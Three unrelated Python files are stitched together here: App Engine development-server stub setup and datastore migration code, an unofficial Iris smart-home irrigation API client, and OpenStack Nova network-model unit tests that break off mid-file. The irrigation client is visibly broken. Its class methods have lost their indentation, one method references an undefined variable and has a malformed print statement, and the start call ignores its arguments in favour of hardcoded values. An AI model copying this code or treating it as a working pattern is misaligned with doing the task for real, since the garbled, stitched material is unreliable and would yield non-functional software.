    datastore_auto_id_policy: The type of sequence from which the datastore
        stub assigns auto IDs, either datastore_stub_util.SEQUENTIAL or
        datastore_stub_util.SCATTERED.
    images_host_prefix: The URL prefix (protocol://host:port) to prepend to
        image urls on calls to images.GetUrlBase.
    logs_path: Path to the file to store the logs data in.
    mail_smtp_host: The SMTP hostname that should be used when sending e-mails.
        If None then the mail_enable_sendmail argument is considered.
    mail_smtp_port: The SMTP port number that should be used when sending
        e-mails. If this value is None then mail_smtp_host must also be None.
    mail_smtp_user: The username to use when authenticating with the
        SMTP server. This value may be None if mail_smtp_host is also None or if
        the SMTP server does not require authentication.
    mail_smtp_password: The password to use when authenticating with the
        SMTP server. This value may be None if mail_smtp_host or mail_smtp_user
        is also None.
    mail_enable_sendmail: A bool indicating if sendmail should be used when
        sending e-mails. This argument is ignored if mail_smtp_host is not None.
    mail_show_mail_body: A bool indicating whether the body of sent e-mails
        should be written to the logs.
    mail_allow_tls: A bool indicating whether TLS should be allowed when
        communicating with an SMTP server. This argument is ignored if
        mail_smtp_host is None.
    matcher_prospective_search_path: The path to the file that should be used to
        save prospective search subscriptions.
    search_index_path: The path to the file that should be used for search index
        storage.
    taskqueue_auto_run_tasks: A bool indicating whether taskqueue tasks should
        be run automatically or if they must be manually triggered.
    taskqueue_default_http_server: A str containing the address of the http
        server that should be used to execute tasks.
    user_login_url: A str containing the url that should be used for user login.
    user_logout_url: A str containing the url that should be used for user
        logout.
    default_gcs_bucket_name: A str, overriding the default bucket behavior.
  """
  identity_stub = app_identity_stub.AppIdentityServiceStub.Create(
      email_address=appidentity_email_address,
      private_key_path=appidentity_private_key_path)
  if default_gcs_bucket_name is not None:
    identity_stub.SetDefaultGcsBucketName(default_gcs_bucket_name)
  apiproxy_stub_map.apiproxy.RegisterStub('app_identity_service', identity_stub)
  blob_storage = file_blob_storage.FileBlobStorage(blobstore_path, app_id)
  apiproxy_stub_map.apiproxy.RegisterStub(
      'blobstore',
      blobstore_stub.BlobstoreServiceStub(blob_storage,
                                          request_data=request_data))
  apiproxy_stub_map.apiproxy.RegisterStub(
      'capability_service',
      capability_stub.CapabilityServiceStub())
  apiproxy_stub_map.apiproxy.RegisterStub(
      'channel',
      channel_service_stub.ChannelServiceStub(request_data=request_data))
  datastore_stub = datastore_sqlite_stub.DatastoreSqliteStub(
      app_id,
      datastore_path,
      datastore_require_indexes,
      trusted,
      root_path=application_root,
      auto_id_policy=datastore_auto_id_policy)
  datastore_stub.SetConsistencyPolicy(datastore_consistency)
  # ReplaceStub rather than RegisterStub: a datastore stub may already be
  # registered (e.g. by the file-stub -> sqlite conversion path).
  apiproxy_stub_map.apiproxy.ReplaceStub(
      'datastore_v3', datastore_stub)
  apiproxy_stub_map.apiproxy.RegisterStub(
      'datastore_v4',
      datastore_v4_stub.DatastoreV4Stub(app_id))
  apiproxy_stub_map.apiproxy.RegisterStub(
      'file',
      file_service_stub.FileServiceStub(blob_storage))
  try:
    from google.appengine.api.images import images_stub
  except ImportError:
    # The images stub depends on PIL, which is optional; degrade gracefully.
    logging.warning('Could not initialize images API; you are likely missing '
                    'the Python "PIL" module.')
    # We register a stub which throws a NotImplementedError for most RPCs.
    from google.appengine.api.images import images_not_implemented_stub
    apiproxy_stub_map.apiproxy.RegisterStub(
        'images',
        images_not_implemented_stub.ImagesNotImplementedServiceStub(
            host_prefix=images_host_prefix))
  else:
    apiproxy_stub_map.apiproxy.RegisterStub(
        'images',
        images_stub.ImagesServiceStub(host_prefix=images_host_prefix))
  apiproxy_stub_map.apiproxy.RegisterStub(
      'logservice',
      logservice_stub.LogServiceStub(logs_path=logs_path))
  apiproxy_stub_map.apiproxy.RegisterStub(
      'mail',
      mail_stub.MailServiceStub(mail_smtp_host,
                                mail_smtp_port,
                                mail_smtp_user,
                                mail_smtp_password,
                                enable_sendmail=mail_enable_sendmail,
                                show_mail_body=mail_show_mail_body,
                                allow_tls=mail_allow_tls))
  apiproxy_stub_map.apiproxy.RegisterStub(
      'memcache',
      memcache_stub.MemcacheServiceStub())
  apiproxy_stub_map.apiproxy.RegisterStub(
      'search',
      simple_search_stub.SearchServiceStub(index_file=search_index_path))
  apiproxy_stub_map.apiproxy.RegisterStub(
      'modules',
      modules_stub.ModulesServiceStub(request_data))
  apiproxy_stub_map.apiproxy.RegisterStub(
      'system',
      system_stub.SystemServiceStub(request_data=request_data))
  apiproxy_stub_map.apiproxy.RegisterStub(
      'taskqueue',
      taskqueue_stub.TaskQueueServiceStub(
          root_path=application_root,
          auto_task_running=taskqueue_auto_run_tasks,
          default_http_server=taskqueue_default_http_server,
          request_data=request_data))
  apiproxy_stub_map.apiproxy.GetStub('taskqueue').StartBackgroundExecution()
  apiproxy_stub_map.apiproxy.RegisterStub(
      'urlfetch',
      urlfetch_stub.URLFetchServiceStub())
  apiproxy_stub_map.apiproxy.RegisterStub(
      'user',
      user_service_stub.UserServiceStub(login_url=user_login_url,
                                        logout_url=user_logout_url,
                                        request_data=request_data))
  apiproxy_stub_map.apiproxy.RegisterStub(
      'xmpp',
      xmpp_service_stub.XmppServiceStub())
  # The prospective search stub delivers matches via taskqueue, so it needs
  # the taskqueue stub registered above.
  apiproxy_stub_map.apiproxy.RegisterStub(
      'matcher',
      prospective_search_stub.ProspectiveSearchStub(
          matcher_prospective_search_path,
          apiproxy_stub_map.apiproxy.GetStub('taskqueue')))
  apiproxy_stub_map.apiproxy.RegisterStub(
      'remote_socket',
      _remote_socket_stub.RemoteSocketServiceStub())
def maybe_convert_datastore_file_stub_data_to_sqlite(app_id, filename):
  """Convert file-stub datastore data at *filename* to sqlite if needed.

  Returns silently when the file is not readable+writable, cannot be opened,
  or is already in sqlite format.  Conversion failures are logged and
  re-raised.
  """
  readable_and_writable = os.access(filename, os.R_OK | os.W_OK)
  if not readable_and_writable:
    return
  try:
    f = open(filename, 'rb')
    try:
      header = f.read(16)
    finally:
      f.close()
  except (IOError, OSError):
    return
  if header == 'SQLite format 3\x00':
    # Already sqlite-formatted; nothing to do.
    return
  try:
    _convert_datastore_file_stub_data_to_sqlite(app_id, filename)
  except:
    logging.exception('Failed to convert datastore file stub data to sqlite.')
    raise
def _convert_datastore_file_stub_data_to_sqlite(app_id, datastore_path):
  """Migrate file-stub datastore data at *datastore_path* to sqlite format.

  Reads every entity through a temporary DatastoreFileStub, writes them into
  a sqlite stub at <path>.sqlite, then swaps the files, keeping the original
  as <path>.filestub.
  """
  logging.info('Converting datastore stub data to sqlite.')
  previous_stub = apiproxy_stub_map.apiproxy.GetStub('datastore_v3')
  try:
    # Work against a fresh stub map so the conversion stubs don't collide
    # with any existing registrations.
    apiproxy_stub_map.apiproxy = apiproxy_stub_map.APIProxyStubMap()
    datastore_stub = datastore_file_stub.DatastoreFileStub(
        app_id, datastore_path, trusted=True, save_changes=False)
    apiproxy_stub_map.apiproxy.RegisterStub('datastore_v3', datastore_stub)
    entities = _fetch_all_datastore_entities()
    sqlite_datastore_stub = datastore_sqlite_stub.DatastoreSqliteStub(
        app_id, datastore_path + '.sqlite', trusted=True)
    apiproxy_stub_map.apiproxy.ReplaceStub('datastore_v3',
                                           sqlite_datastore_stub)
    datastore.Put(entities)
    sqlite_datastore_stub.Close()
  finally:
    # NOTE(review): this restores the previous datastore stub onto the NEW
    # stub map created above, not onto the original map -- confirm callers
    # expect apiproxy to remain the fresh map afterwards.
    apiproxy_stub_map.apiproxy.ReplaceStub('datastore_v3', previous_stub)
  # Keep the old file-stub data as a backup before moving sqlite into place.
  shutil.copy(datastore_path, datastore_path + '.filestub')
  os.remove(datastore_path)
  shutil.move(datastore_path + '.sqlite', datastore_path)
  logging.info('Datastore conversion complete. File stub data has been backed '
               'up in %s', datastore_path + '.filestub')
def _fetch_all_datastore_entities():
  """Returns all datastore entities from all namespaces as a list."""
  entities = []
  for ns in datastore.Query('__namespace__').Run():
    ns_name = ns.key().name()
    kinds = datastore.Query('__kind__', namespace=ns_name).Run()
    for kind in kinds:
      kind_query = datastore.Query(kind.key().name(), namespace=ns_name)
      entities.extend(kind_query.Run())
  return entities
def test_setup_stubs(
    request_data=None,
    app_id='myapp',
    application_root='/tmp/root',
    trusted=False,
    appidentity_email_address=None,
    appidentity_private_key_path=None,
    blobstore_path='/dev/null',
    datastore_consistency=None,
    datastore_path=':memory:',
    datastore_require_indexes=False,
    datastore_auto_id_policy=datastore_stub_util.SCATTERED,
    images_host_prefix='http://localhost:8080',
    logs_path=':memory:',
    mail_smtp_host='',
    mail_smtp_port=25,
    mail_smtp_user='',
    mail_smtp_password='',
    mail_enable_sendmail=False,
    mail_show_mail_body=False,
    mail_allow_tls=True,
    matcher_prospective_search_path='/dev/null',
    search_index_path=None,
    taskqueue_auto_run_tasks=False,
    taskqueue_default_http_server='http://localhost:8080',
    user_login_url='/_ah/login?continue=%s',
    user_logout_url='/_ah/login?continue=%s',
    default_gcs_bucket_name=None):
  """Similar to setup_stubs with reasonable test defaults and recallable."""
  # Reset the stub map between requests because a stub map only allows a
  # stub to be added once.
  apiproxy_stub_map.apiproxy = apiproxy_stub_map.APIProxyStubMap()
  if datastore_consistency is None:
    datastore_consistency = (
        datastore_stub_util.PseudoRandomHRConsistencyPolicy())
  setup_stubs(request_data,
              app_id,
              application_root,
              trusted,
              appidentity_email_address,
              appidentity_private_key_path,
              blobstore_path,
              datastore_consistency,
              datastore_path,
              datastore_require_indexes,
              datastore_auto_id_policy,
              images_host_prefix,
              logs_path,
              mail_smtp_host,
              mail_smtp_port,
              mail_smtp_user,
              mail_smtp_password,
              mail_enable_sendmail,
              mail_show_mail_body,
              mail_allow_tls,
              matcher_prospective_search_path,
              search_index_path,
              taskqueue_auto_run_tasks,
              taskqueue_default_http_server,
              user_login_url,
              user_logout_url,
              default_gcs_bucket_name)
def cleanup_stubs():
  """Flush stub state to storage and stop background task execution."""
  get_stub = apiproxy_stub_map.apiproxy.GetStub
  # Persist the datastore contents.
  logging.info('Applying all pending transactions and saving the datastore')
  get_stub('datastore_v3').Write()
  logging.info('Saving search indexes')
  get_stub('search').Write()
  get_stub('taskqueue').Shutdown()
| |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import os
import traceback
def LogConsole(arg):
    """Print *arg* to stdout, rendered through '%s' formatting."""
    message = "%s" % arg
    print(message)
#===============================================================================
# easy_install requests
from requests import session
import json
import urllib
import uuid
class Iris:
#-----------------------------------------------------------------------------
#
# login
#
def login(self, username, password):
payload = {
'username': username,
'password': password,
'caller': 'iPhone',
'detail': 'tariff hub widgets',
'version': '1.8.1',
}
payloadString = ""
for key in payload:
payloadString += "%s=%s&" % (key, urllib.quote(payload[key]))
payloadString = payloadString[:len(payloadString)-1]
print payloadString
response = self.www.post('https://api.irissmarthome.com/v5/login', data=payloadString, headers=self.headers, proxies=self.proxies)
print response
# print response.status_code
if response.status_code == 200:
LogConsole("Login success")
return 0
else:
LogConsole("Login fail")
return 1
#-----------------------------------------------------------------------------
def irrigationState(self, username):
self.headers['If-None-Match'] = str(uuid.uuid4()).replace('-','')
response = None
while True:
response = self.www.get('https://api.irissmarthome.com/v5/users/%s/widgets/irrigation' % username, headers=self.headers, proxies=self.proxies)
if response.status_code != 304:
break
print response
data = response.json()
# print data
# print data['irrigation']['devices']
for device in data['irrigation']['devices']:
print device['id']
print device['name']
zone = data['irrigation']['active']
print zone['id']
print zone['name']
print zone['state']
# print response.status_code
if response.status_code == 200:
LogConsole("Irrigation success")
return 0
else:
LogConsole("Irrigation fail")
return 1
#-----------------------------------------------------------------------------
def dashboard(self, username):
self.headers['If-None-Match'] = str(uuid.uuid4()).replace('-','')
response = None
while True:
response = self.www.get('https://api.irissmarthome.com/v5/users/%s/widgets/dashboard?logSize=3' % username, headers=self.headers, proxies=self.proxies)
if response.status_code != 304:
break
print response
data = response.json()
# print data
devices = data['IRRIGATION']['irrigation']
print devices
for device in devices:
print "%s:%s" % device['id'], device['state']
if state == 'WATERING':
return True
elif state == 'IDLE':
return False
else:
return False
# print response.status_code
if response.status_code == 200:
LogConsole("Irrigation success")
return 0
else:
LogConsole("Irrigation fail")
return 1
#-----------------------------------------------------------------------------
def irrigationStart(self, username, macaddr, duration):
self.headers.pop('If-None-Match', None)
payload = {
'duration': 1,
'zoneId': 'AD-2E-00-00-0B-B6-AD-01'
}
response = self.www.put('https://api.irissmarthome.com/v5/users/%s/widgets/irrigation/%s/state' % (username, macaddr), headers=self.headers, data=payload, proxies=self.proxies)
print response
# print response.status_code
if response.status_code == 204:
LogConsole("Irrigation success")
return 0
else:
LogConsole("Irrigation fail")
return 1
#-----------------------------------------------------------------------------
def irrigationStop(self, username, macaddr):
self.headers.pop('If-None-Match', None)
response = self.www.put('https://api.irissmarthome.com/v5/users/%s/widgets/irrigation/%s/stop' % (username, macaddr), headers=self.headers, proxies=self.proxies)
print response
# print response.status_code
if response.status_code == 204:
LogConsole("Irrigation success")
return 0
else:
LogConsole("Irrigation fail")
return 1
#-----------------------------------------------------------------------------
def logout(self):
None
#-----------------------------------------------------------------------------
def __init__(self, arg):
    """Create an HTTP session preconfigured for the Iris mobile API.

    arg -- accepted for call-site compatibility; unused here.
    """
    try:
        self.www = session()
        # All traffic is routed through a local debugging proxy.
        self.proxies = {
            "http": "http://192.168.1.201:8888",
            "https": "http://192.168.1.201:8888",
        }
        # Impersonate the official iOS client.
        self.headers = {
            "User-Agent": "Iris 1.8.1 rv:1173 (iPhone; iPhone OS 7.1; en_US)",
            "Content-Type": "application/x-www-form-urlencoded; charset=utf-8",
            "Accept-Encoding": "gzip",
            "Connection": "close",
            "Proxy-Connection": "close",
        }
    # BUG FIX: the bare ``except:`` also swallowed SystemExit and
    # KeyboardInterrupt; only trap genuine errors.
    except Exception:
        print(sys.exc_info()[0])
#===============================================================================
if __name__ == "__main__":
    version = 1.0
    LogConsole("Iris Control v.%f" % version)
    # Config file lives next to the script.
    configFile = "%s/config.json" % os.path.dirname(sys.argv[0])
    # BUG FIX: the file handle was never closed.
    with open(os.path.expanduser(configFile), 'r') as fd:
        config = json.load(fd)
    argc = len(sys.argv)
    # BUG FIX: the original read sys.argv[2] for any argc != 1, so a
    # single extra argument crashed with IndexError.  Also renamed
    # ``filter`` (shadowed the builtin); the value is currently unused.
    if argc < 3:
        device_filter = 'Water'
        tgtstate = 'off'
    else:
        device_filter = sys.argv[1].lower().strip()
        tgtstate = sys.argv[2].lower().strip()
    iris = Iris(0)
    username = config['iris']['username']
    rc = iris.login(username, config['iris']['password'])
    if rc:
        exit(1)
    macaddr = '00-00-00-00-00-00-00-00'
    if tgtstate == 'on':
        iris.irrigationState(username)
        # BUG FIX: capture the operation result; the original discarded
        # it, so the final rc check only ever reflected the login.
        rc = iris.irrigationStart(username, macaddr, 1)
        iris.irrigationState(username)
    else:
        iris.irrigationState(username)
        rc = iris.irrigationStop(username, macaddr)
        iris.irrigationState(username)
    if rc:
        exit(1)
    iris.logout()
#===============================================================================
| |
# Copyright 2011 OpenStack Foundation
# All Rights Reserved.
# Copyright 2013 IBM Corp.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_config import cfg
from nova import exception
from nova.network import model
from nova import test
from nova.tests.unit import fake_network_cache_model
from nova.virt import netutils
class RouteTests(test.NoDBTestCase):
    """Unit tests for the ``model.Route`` network-cache object."""

    def test_create_route_with_attrs(self):
        route = fake_network_cache_model.new_route()
        fake_network_cache_model.new_ip(dict(address='192.168.1.1'))
        self.assertEqual('0.0.0.0/24', route['cidr'])
        self.assertEqual('192.168.1.1', route['gateway']['address'])
        self.assertEqual('eth0', route['interface'])

    def test_routes_equal(self):
        self.assertEqual(model.Route(), model.Route())

    def test_routes_not_equal(self):
        # Routes differing in any single attribute must compare unequal.
        unequal_pairs = [
            (dict(cidr='1.1.1.0/24'), dict(cidr='2.2.2.0/24')),
            (dict(cidr='1.1.1.1/24', gateway='1.1.1.1'),
             dict(cidr='1.1.1.1/24', gateway='1.1.1.2')),
            (dict(cidr='1.1.1.1/24', interface='tap0'),
             dict(cidr='1.1.1.1/24', interface='tap1')),
        ]
        for kwargs_a, kwargs_b in unequal_pairs:
            self.assertNotEqual(model.Route(**kwargs_a),
                                model.Route(**kwargs_b))

    def test_hydrate(self):
        gateway_ip = fake_network_cache_model.new_ip(
            dict(address='192.168.1.1'))
        route = model.Route.hydrate({'gateway': gateway_ip})
        self.assertIsNone(route['cidr'])
        self.assertEqual('192.168.1.1', route['gateway']['address'])
        self.assertIsNone(route['interface'])
class IPTests(test.NoDBTestCase):
    """Unit tests for the ``model.IP`` object."""

    def test_ip_equal(self):
        self.assertEqual(model.IP(address='127.0.0.1'),
                         model.IP(address='127.0.0.1'))

    def test_ip_not_equal(self):
        # Address, type and version each participate in equality.
        self.assertNotEqual(model.IP(address='127.0.0.1'),
                            model.IP(address='172.0.0.3'))
        self.assertNotEqual(model.IP(address='127.0.0.1', type=1),
                            model.IP(address='172.0.0.1', type=2))
        self.assertNotEqual(model.IP(address='127.0.0.1', version=4),
                            model.IP(address='172.0.0.1', version=6))
class FixedIPTests(test.NoDBTestCase):
    """Unit tests for the ``model.FixedIP`` object."""

    def test_createnew_fixed_ip_with_attrs(self):
        fixed_ip = model.FixedIP(address='192.168.1.100')
        self.assertEqual('192.168.1.100', fixed_ip['address'])
        self.assertEqual([], fixed_ip['floating_ips'])
        self.assertEqual('fixed', fixed_ip['type'])
        # Version is derived from the address family.
        self.assertEqual(4, fixed_ip['version'])

    def test_create_fixed_ipv6(self):
        fixed_ip = model.FixedIP(address='::1')
        self.assertEqual('::1', fixed_ip['address'])
        self.assertEqual([], fixed_ip['floating_ips'])
        self.assertEqual('fixed', fixed_ip['type'])
        self.assertEqual(6, fixed_ip['version'])

    def test_create_fixed_bad_ip_fails(self):
        self.assertRaises(exception.InvalidIpAddressError,
                          model.FixedIP, address='picklespicklespickles')

    def test_equate_two_fixed_ips(self):
        self.assertEqual(model.FixedIP(address='::1'),
                         model.FixedIP(address='::1'))

    def test_equate_two_dissimilar_fixed_ips_fails(self):
        # Any single differing attribute breaks equality.
        self.assertNotEqual(model.FixedIP(address='::1'),
                            model.FixedIP(address='::2'))
        self.assertNotEqual(model.FixedIP(address='::1', type='1'),
                            model.FixedIP(address='::1', type='2'))
        self.assertNotEqual(model.FixedIP(address='::1', version='6'),
                            model.FixedIP(address='::1', version='4'))
        self.assertNotEqual(
            model.FixedIP(address='::1', floating_ips='1.1.1.1'),
            model.FixedIP(address='::1', floating_ips='8.8.8.8'))

    def test_hydrate(self):
        fixed_ip = model.FixedIP.hydrate({})
        self.assertEqual([], fixed_ip['floating_ips'])
        self.assertIsNone(fixed_ip['address'])
        self.assertEqual('fixed', fixed_ip['type'])
        self.assertIsNone(fixed_ip['version'])

    def test_add_floating_ip(self):
        fixed_ip = model.FixedIP(address='192.168.1.100')
        fixed_ip.add_floating_ip('192.168.1.101')
        self.assertEqual(['192.168.1.101'], fixed_ip['floating_ips'])

    def test_add_floating_ip_repeatedly_only_one_instance(self):
        fixed_ip = model.FixedIP(address='192.168.1.100')
        # Duplicate adds must collapse to a single entry.
        for _ in range(10):
            fixed_ip.add_floating_ip('192.168.1.101')
        self.assertEqual(['192.168.1.101'], fixed_ip['floating_ips'])
class SubnetTests(test.NoDBTestCase):
    """Unit tests for the ``model.Subnet`` object."""

    def test_create_subnet_with_attrs(self):
        subnet = fake_network_cache_model.new_subnet()
        default_route = fake_network_cache_model.new_route()
        self.assertEqual('10.10.0.0/24', subnet['cidr'])
        self.assertEqual(
            [fake_network_cache_model.new_ip(dict(address='1.2.3.4')),
             fake_network_cache_model.new_ip(dict(address='2.3.4.5'))],
            subnet['dns'])
        self.assertEqual('10.10.0.1', subnet['gateway']['address'])
        self.assertEqual(
            [fake_network_cache_model.new_fixed_ip(
                 dict(address='10.10.0.2')),
             fake_network_cache_model.new_fixed_ip(
                 dict(address='10.10.0.3'))],
            subnet['ips'])
        self.assertEqual([default_route], subnet['routes'])
        self.assertEqual(4, subnet['version'])

    def test_subnet_equal(self):
        self.assertEqual(fake_network_cache_model.new_subnet(),
                         fake_network_cache_model.new_subnet())

    def test_subnet_not_equal(self):
        # A difference in any single attribute breaks equality.
        unequal_cases = [
            ('cidr', '1.1.1.0/24', '2.2.2.0/24'),
            ('dns', '1.1.1.0/24', '2.2.2.0/24'),
            ('gateway', '1.1.1.1/24', '2.2.2.1/24'),
            ('ips', '1.1.1.0/24', '2.2.2.0/24'),
            ('routes', '1.1.1.0/24', '2.2.2.0/24'),
            ('version', '4', '6'),
        ]
        for attr, value_a, value_b in unequal_cases:
            self.assertNotEqual(model.Subnet(**{attr: value_a}),
                                model.Subnet(**{attr: value_b}))

    def test_add_route(self):
        subnet = fake_network_cache_model.new_subnet()
        default_route = fake_network_cache_model.new_route()
        extra_route = fake_network_cache_model.new_route(
            {'cidr': '1.1.1.1/24'})
        subnet.add_route(extra_route)
        self.assertEqual([default_route, extra_route], subnet['routes'])

    def test_add_route_a_lot(self):
        subnet = fake_network_cache_model.new_subnet()
        default_route = fake_network_cache_model.new_route()
        extra_route = fake_network_cache_model.new_route(
            {'cidr': '1.1.1.1/24'})
        # Duplicate adds must collapse to a single entry.
        for _ in range(10):
            subnet.add_route(extra_route)
        self.assertEqual([default_route, extra_route], subnet['routes'])

    def test_add_dns(self):
        subnet = fake_network_cache_model.new_subnet()
        subnet.add_dns(fake_network_cache_model.new_ip(
            dict(address='9.9.9.9')))
        self.assertEqual(
            [fake_network_cache_model.new_ip(dict(address='1.2.3.4')),
             fake_network_cache_model.new_ip(dict(address='2.3.4.5')),
             fake_network_cache_model.new_ip(dict(address='9.9.9.9'))],
            subnet['dns'])

    def test_add_dns_a_lot(self):
        subnet = fake_network_cache_model.new_subnet()
        # Duplicate DNS entries must collapse to one.
        for _ in range(10):
            subnet.add_dns(fake_network_cache_model.new_ip(
                dict(address='9.9.9.9')))
        self.assertEqual(
            [fake_network_cache_model.new_ip(dict(address='1.2.3.4')),
             fake_network_cache_model.new_ip(dict(address='2.3.4.5')),
             fake_network_cache_model.new_ip(dict(address='9.9.9.9'))],
            subnet['dns'])

    def test_add_ip(self):
        subnet = fake_network_cache_model.new_subnet()
        subnet.add_ip(fake_network_cache_model.new_ip(
            dict(address='192.168.1.102')))
        self.assertEqual(
            [fake_network_cache_model.new_fixed_ip(
                 dict(address='10.10.0.2')),
             fake_network_cache_model.new_fixed_ip(
                 dict(address='10.10.0.3')),
             fake_network_cache_model.new_ip(
                 dict(address='192.168.1.102'))],
            subnet['ips'])

    def test_add_ip_a_lot(self):
        subnet = fake_network_cache_model.new_subnet()
        # Duplicate IP adds must collapse to one.
        for _ in range(10):
            subnet.add_ip(fake_network_cache_model.new_fixed_ip(
                dict(address='192.168.1.102')))
        self.assertEqual(
            [fake_network_cache_model.new_fixed_ip(
                 dict(address='10.10.0.2')),
             fake_network_cache_model.new_fixed_ip(
                 dict(address='10.10.0.3')),
             fake_network_cache_model.new_fixed_ip(
                 dict(address='192.168.1.102'))],
            subnet['ips'])

    def test_hydrate(self):
        subnet_dict = {
            'cidr': '255.255.255.0',
            'dns': [fake_network_cache_model.new_ip(
                dict(address='1.1.1.1'))],
            'ips': [fake_network_cache_model.new_fixed_ip(
                dict(address='2.2.2.2'))],
            'routes': [fake_network_cache_model.new_route()],
            'version': 4,
            'gateway': fake_network_cache_model.new_ip(
                dict(address='3.3.3.3'))}
        subnet = model.Subnet.hydrate(subnet_dict)
        self.assertEqual('255.255.255.0', subnet['cidr'])
        self.assertEqual([fake_network_cache_model.new_ip(
            dict(address='1.1.1.1'))], subnet['dns'])
        self.assertEqual('3.3.3.3', subnet['gateway']['address'])
        self.assertEqual([fake_network_cache_model.new_fixed_ip(
            dict(address='2.2.2.2'))], subnet['ips'])
        self.assertEqual([fake_network_cache_model.new_route()],
                         subnet['routes'])
        self.assertEqual(4, subnet['version'])
class NetworkTests(test.NoDBTestCase):
    """Unit tests for the ``model.Network`` object."""

    def test_create_network(self):
        network = fake_network_cache_model.new_network()
        self.assertEqual(1, network['id'])
        self.assertEqual('br0', network['bridge'])
        self.assertEqual('public', network['label'])
        self.assertEqual(
            [fake_network_cache_model.new_subnet(),
             fake_network_cache_model.new_subnet(
                 dict(cidr='255.255.255.255'))], network['subnets'])

    def test_add_subnet(self):
        network = fake_network_cache_model.new_network()
        network.add_subnet(fake_network_cache_model.new_subnet(
            dict(cidr='0.0.0.0')))
        self.assertEqual(
            [fake_network_cache_model.new_subnet(),
             fake_network_cache_model.new_subnet(
                 dict(cidr='255.255.255.255')),
             fake_network_cache_model.new_subnet(dict(cidr='0.0.0.0'))],
            network['subnets'])

    def test_add_subnet_a_lot(self):
        network = fake_network_cache_model.new_network()
        # Re-adding an identical subnet must not create duplicates.
        for _ in range(10):
            network.add_subnet(fake_network_cache_model.new_subnet(
                dict(cidr='0.0.0.0')))
        self.assertEqual(
            [fake_network_cache_model.new_subnet(),
             fake_network_cache_model.new_subnet(
                 dict(cidr='255.255.255.255')),
             fake_network_cache_model.new_subnet(dict(cidr='0.0.0.0'))],
            network['subnets'])

    def test_network_equal(self):
        self.assertEqual(model.Network(), model.Network())

    def test_network_not_equal(self):
        # Each attribute independently participates in equality.
        unequal_pairs = [
            (dict(id='1'), dict(id='2')),
            (dict(bridge='br-int'), dict(bridge='br0')),
            (dict(label='net1'), dict(label='net2')),
            (dict(subnets='1.1.1.0/24'), dict(subnets='2.2.2.0/24')),
        ]
        for kwargs_a, kwargs_b in unequal_pairs:
            self.assertNotEqual(model.Network(**kwargs_a),
                                model.Network(**kwargs_b))

    def test_hydrate(self):
        fake_network_cache_model.new_subnet()
        fake_network_cache_model.new_subnet(dict(cidr='255.255.255.255'))
        network = model.Network.hydrate(
            fake_network_cache_model.new_network())
        self.assertEqual(1, network['id'])
        self.assertEqual('br0', network['bridge'])
        self.assertEqual('public', network['label'])
        self.assertEqual(
            [fake_network_cache_model.new_subnet(),
             fake_network_cache_model.new_subnet(
                 dict(cidr='255.255.255.255'))], network['subnets'])
class VIFTests(test.NoDBTestCase):
    """Unit tests for the ``model.VIF`` object."""

    def test_create_vif(self):
        vif = fake_network_cache_model.new_vif()
        self.assertEqual(1, vif['id'])
        self.assertEqual('aa:aa:aa:aa:aa:aa', vif['address'])
        self.assertEqual(fake_network_cache_model.new_network(),
                         vif['network'])

    def test_vif_equal(self):
        self.assertEqual(model.VIF(), model.VIF())

    def test_vif_not_equal(self):
        # Each attribute independently participates in equality.
        unequal_pairs = [
            (dict(id=1), dict(id=2)),
            (dict(address='00:00:00:00:00:11'),
             dict(address='00:00:00:00:00:22')),
            (dict(network='net1'), dict(network='net2')),
            (dict(type='ovs'), dict(type='linuxbridge')),
            (dict(devname='ovs1234'), dict(devname='linuxbridge1234')),
            (dict(qbh_params=1), dict(qbh_params=None)),
            (dict(qbg_params=1), dict(qbg_params=None)),
            (dict(active=True), dict(active=False)),
            (dict(vnic_type=model.VNIC_TYPE_NORMAL),
             dict(vnic_type=model.VNIC_TYPE_DIRECT)),
            (dict(profile={'pci_slot': '0000:0a:00.1'}),
             dict(profile={'pci_slot': '0000:0a:00.2'})),
            (dict(preserve_on_delete=True),
             dict(preserve_on_delete=False)),
        ]
        for kwargs_a, kwargs_b in unequal_pairs:
            self.assertNotEqual(model.VIF(**kwargs_a),
                                model.VIF(**kwargs_b))

    def test_create_vif_with_type(self):
        vif = fake_network_cache_model.new_vif(dict(
            id=1,
            address='aa:aa:aa:aa:aa:aa',
            network=fake_network_cache_model.new_network(),
            type='bridge'))
        self.assertEqual(1, vif['id'])
        self.assertEqual('aa:aa:aa:aa:aa:aa', vif['address'])
        self.assertEqual('bridge', vif['type'])
        self.assertEqual(fake_network_cache_model.new_network(),
                         vif['network'])

    def test_vif_get_fixed_ips(self):
        vif = fake_network_cache_model.new_vif()
        # Two subnets, each carrying the same pair of fixed IPs.
        expected = [
            fake_network_cache_model.new_fixed_ip(
                dict(address='10.10.0.2')),
            fake_network_cache_model.new_fixed_ip(
                dict(address='10.10.0.3')),
        ] * 2
        self.assertEqual(vif.fixed_ips(), expected)

    def test_vif_get_floating_ips(self):
        vif = fake_network_cache_model.new_vif()
        vif['network']['subnets'][0]['ips'][0].add_floating_ip('192.168.1.1')
        self.assertEqual(['192.168.1.1'], vif.floating_ips())

    def test_vif_get_labeled_ips(self):
        vif = fake_network_cache_model.new_vif()
        expected = {
            'network_id': 1,
            'ips': [fake_network_cache_model.new_ip(
                        {'address': '10.10.0.2', 'type': 'fixed'}),
                    fake_network_cache_model.new_ip(
                        {'address': '10.10.0.3', 'type': 'fixed'})] * 2,
            'network_label': 'public'}
        self.assertEqual(expected, vif.labeled_ips())

    def test_hydrate(self):
        fake_network_cache_model.new_network()
        vif = model.VIF.hydrate(fake_network_cache_model.new_vif())
        self.assertEqual(1, vif['id'])
        self.assertEqual('aa:aa:aa:aa:aa:aa', vif['address'])
        self.assertEqual(fake_network_cache_model.new_network(),
                         vif['network'])

    def test_hydrate_vif_with_type(self):
        vif = model.VIF.hydrate(fake_network_cache_model.new_vif(dict(
            id=1,
            address='aa:aa:aa:aa:aa:aa',
            network=fake_network_cache_model.new_network(),
            type='bridge')))
        self.assertEqual(1, vif['id'])
        self.assertEqual('aa:aa:aa:aa:aa:aa', vif['address'])
        self.assertEqual('bridge', vif['type'])
        self.assertEqual(fake_network_cache_model.new_network(),
                         vif['network'])
class NetworkInfoTests(test.NoDBTestCase):
